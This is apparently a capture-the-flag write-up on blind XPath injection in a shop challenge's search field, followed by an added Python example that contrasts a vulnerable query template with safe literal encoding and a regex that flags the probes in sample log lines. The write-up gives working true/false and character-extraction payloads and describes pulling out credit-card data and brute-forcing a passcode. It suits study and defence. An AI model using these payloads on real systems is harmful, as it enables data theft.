The search field was vulnerable to blind XPath injection.
Correct syntax (a condition that evaluates to true and one that evaluates to false):
```
")] | /* [("a"="a /true
")] | /* [("a"="b /false
```
Data extraction (one character of the root element's name per request):
```
")] | /* [(substring(name(/*[1]),1,1)="s
")] | /* [(substring(name(/*[1]),2,1)="h
")] | /* [(substring(name(/*[1]),3,1)="o
")] | /* [(substring(name(/*[1]),4,1)="p
```
DB name: Shop. Continue the same way until all the CC information has been extracted and you can buy the flag; brute-forcing the VISA passcode was the last step.
**For more information: [https://twitter.com/YShahinzadeh/](https://twitter.com/YShahinzadeh/)**
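As an added example (not code from the write-up or from the challenge itself), the Python below shows why the search field broke: a query template that pastes user input into a quoted XPath literal, beside a builder that encodes the input as a single XPath string literal (using concat() when both quote characters are present), plus a small heuristic that flags the probe strings above in constructed access-log lines. The query template, element names and log format are assumptions.

```python
import re

# Hypothetical search query: the challenge's server code is not shown, so this
# template is an assumption modelled on the payloads in the write-up.
TEMPLATE = '//product[contains(description, {literal})]'

# Probe strings quoted from the write-up, used here as constructed inputs.
PAYLOAD_TRUE = '")] | /* [("a"="a'
PAYLOAD_EXTRACT = '")] | /* [(substring(name(/*[1]),1,1)="s'


def vulnerable_query(user_input: str) -> str:
    """String concatenation: a quote in the input ends the literal, ')]' ends
    the predicate, and the rest of the input is parsed as XPath."""
    return TEMPLATE.format(literal=f'"{user_input}"')


def xpath_literal(value: str) -> str:
    """Encode an arbitrary string as one XPath 1.0 string literal.
    XPath has no escape sequence for quotes, so a value containing both
    kinds is split on the single quote and reassembled with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def safe_query(user_input: str) -> str:
    """Same template, but the input can never leave its literal."""
    return TEMPLATE.format(literal=xpath_literal(user_input))


# Quote followed by closing brackets and a union/boolean, or XPath oracle
# functions: the shapes seen in the blind-injection probes above.
INJECTION_RE = re.compile(
    r'["\']\s*[\)\]]+\s*(?:\||and\b|or\b)|\b(?:substring|string-length|name|count)\s*\(',
    re.I,
)

# Constructed access-log lines (not from the challenge).
SAMPLE_LOG = [
    '10.0.0.5 GET /search?q=red shoes',
    '10.0.0.9 GET /search?q=' + PAYLOAD_TRUE,
    '10.0.0.9 GET /search?q=' + PAYLOAD_EXTRACT,
]


def flag_suspicious(log_lines):
    """Return the search terms that look like XPath probing."""
    hits = []
    for line in log_lines:
        m = re.search(r'q=(.*)$', line)
        if m and INJECTION_RE.search(m.group(1)):
            hits.append(m.group(1))
    return hits
```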